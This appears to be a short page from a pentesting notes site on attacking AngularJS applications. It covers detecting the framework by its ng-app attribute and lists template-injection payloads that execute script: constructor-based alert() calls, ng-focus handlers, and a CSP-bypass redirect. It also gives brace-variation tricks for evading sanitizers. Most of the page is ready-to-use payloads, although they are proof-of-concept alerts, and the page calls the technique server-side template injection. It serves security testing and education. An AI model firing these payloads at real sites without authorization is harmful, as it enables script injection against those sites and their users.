Exploit Notes

Angular Pentesting

Last modified: 2023-07-12

SSTI Web

AngularJS is a web application framework.

HTML Attributes

If a website uses AngularJS framework, the nodes have a “ng-apps” attribute. So you can check it in a HTML source code.

<div ng-apps>

Server-Side Template Injection (SSTI)

{{2*3}}
{{$on.constructor('alert("test")')()}}
{{constructor.constructor('alert("test")')()}}
<input ng-focus=$event.view.alert('test')>

<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

It worth testing to bypass sanitizing as below.

# Remove one-pair braces
{2*3}

# Remove all braces
2*3

# Add additional braces
{{{2*3}}}